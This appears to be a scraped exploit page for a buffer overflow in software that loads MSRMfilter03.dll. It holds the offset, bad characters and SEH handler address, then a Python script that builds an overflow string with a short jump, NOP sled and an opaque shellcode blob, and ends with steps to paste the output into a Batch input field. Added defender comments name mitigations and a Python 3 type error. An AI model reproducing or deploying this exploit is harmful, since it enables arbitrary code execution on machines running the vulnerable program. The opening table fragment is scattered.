badchar
omitted
\x00\x0a
offset
omitted
9012
return address
seh
omitted
# MSRMfilter03.dll
0x1002d619
shellcode
exploit.py
# Proof-of-concept generator: builds one oversized string and writes it to
# exploit.txt. The page's table gives the parameters used below: offset 9012,
# bad characters \x00 and \x0a, and an SEH return address of 0x1002d619
# attributed to MSRMfilter03.dll.
#
# Defender notes:
#   * The trigger is an input field that accepts more than 9000 bytes without a
#     length check; bounding and validating that input removes the overflow.
#   * A hard-coded handler address implies the referenced module loads at a
#     predictable base -- presumably it is built without ASLR/SafeSEH; confirm
#     against the actual binary. SafeSEH, SEHOP, ASLR and DEP are the relevant
#     platform mitigations for this class of bug.
#
# NOTE(review): `payload` is assembled from str literals while `shellcode` is a
# bytes object, so the final concatenation raises TypeError on Python 3; the
# listing assumes Python 2 string semantics.

# Opaque machine-code blob, reproduced byte-for-byte. What it does cannot be
# determined from this page; treat it as untrusted and never run it outside an
# isolated analysis environment.
shellcode = (
    b"\xda\xc9\xd9\x74\x24\xf4\x5e\xb8\xe8\x22\xd7"
    b"\xb1\x29\xc9\xb1\x52\x31\x46\x17\x83\xc6\x04"
    b"\x03\xae\x31\x35\x44\xd2\xde\x3b\xa7\x2a\x1f"
    b"\x5c\x21\xcf\x2e\x5c\x55\x84\x01\x6c\x1d\xc8"
    b"\xad\x07\x73\xf8\x26\x65\x5c\x0f\x8e\xc0\xba"
    b"\x3e\x0f\x78\xfe\x21\x93\x83\xd3\x81\xaa\x4b"
    b"\x26\xc0\xeb\xb6\xcb\x90\xa4\xbd\x7e\x04\xc0"
    b"\x88\x42\xaf\x9a\x1d\xc3\x4c\x6a\x1f\xe2\xc3"
    b"\xe0\x46\x24\xe2\x25\xf3\x6d\xfc\x2a\x3e\x27"
    b"\x77\x98\xb4\xb6\x51\xd0\x35\x14\x9c\xdc\xc7"
    b"\x64\xd9\xdb\x37\x13\x13\x18\xc5\x24\xe0\x62"
    b"\x11\xa0\xf2\xc5\xd2\x12\xde\xf4\x37\xc4\x95"
    b"\xfb\xfc\x82\xf1\x1f\x02\x46\x8a\x24\x8f\x69"
    b"\x5c\xad\xcb\x4d\x78\xf5\x88\xec\xd9\x53\x7e"
    b"\x10\x39\x3c\xdf\xb4\x32\xd1\x34\xc5\x19\xbe"
    b"\xf9\xe4\xa1\x3e\x96\x7f\xd2\x0c\x39\xd4\x7c"
    b"\x3d\xb2\xf2\x7b\x42\xe9\x43\x13\xbd\x12\xb4"
    b"\x3a\x7a\x46\xe4\x54\xab\xe7\x6f\xa4\x54\x32"
    b"\x3f\xf4\xfa\xed\x80\xa4\xba\x5d\x69\xae\x34"
    b"\x81\x89\xd1\x9e\xaa\x20\x28\x49\x15\x1c\x33"
    b"\xd0\xfd\x5f\x33\xe3\x46\xd6\xd5\x89\xa8\xbf"
    b"\x4e\x26\x50\x9a\x04\xd7\x9d\x30\x61\xd7\x16"
    b"\xb7\x96\x96\xde\xb2\x84\x4f\x2f\x89\xf6\xc6"
    b"\x30\x27\x9e\x85\xa3\xac\x5e\xc3\xdf\x7a\x09"
    b"\x84\x2e\x73\xdf\x38\x08\x2d\xfd\xc0\xcc\x16"
    b"\x45\x1f\x2d\x98\x44\xd2\x09\xbe\x56\x2a\x91"
    b"\xfa\x02\xe2\xc4\x54\xfc\x44\xbf\x16\x56\x1f"
    b"\x6c\xf1\x3e\xe6\x5e\xc2\x38\xe7\x8a\xb4\xa4"
    b"\x56\x63\x81\xdb\x57\xe3\x05\xa4\x85\x93\xea"
    b"\x7f\x0e\xa3\xa0\xdd\x27\x2c\x6d\xb4\x75\x31"
    b"\x8e\x63\xb9\x4c\x0d\x81\x42\xab\x0d\xe0\x47"
    b"\xf7\x89\x19\x3a\x68\x7c\x1d\xe9\x89\x55"
)

# Layout of the string, in order:
#   1. filler "A" bytes, ending four bytes short of the 9012-byte offset;
#   2. four bytes at offset 9008: EB 06 is an x86 short jump forward, padded
#      with two 0x41 bytes -- presumably the next-SEH field of the overwritten
#      record, since the page labels the return address "seh";
#   3. 0x1002d619 written little-endian at offset 9012;
#   4. sixteen 0x90 (x86 NOP) bytes ahead of the blob.
payload = (
    "A" * (9012 - 4)
    + "\xeb\x06\x41\x41"
    + "\x19\xd6\x02\x10"
    + "\x90" * 16
)
payload += shellcode

# Text-mode write to the current working directory; an existing exploit.txt is
# overwritten.
with open("exploit.txt", "w") as handle:
    handle.write(payload)
|
proof
Batch
->Input
, paste the content of exploit.txt
->OK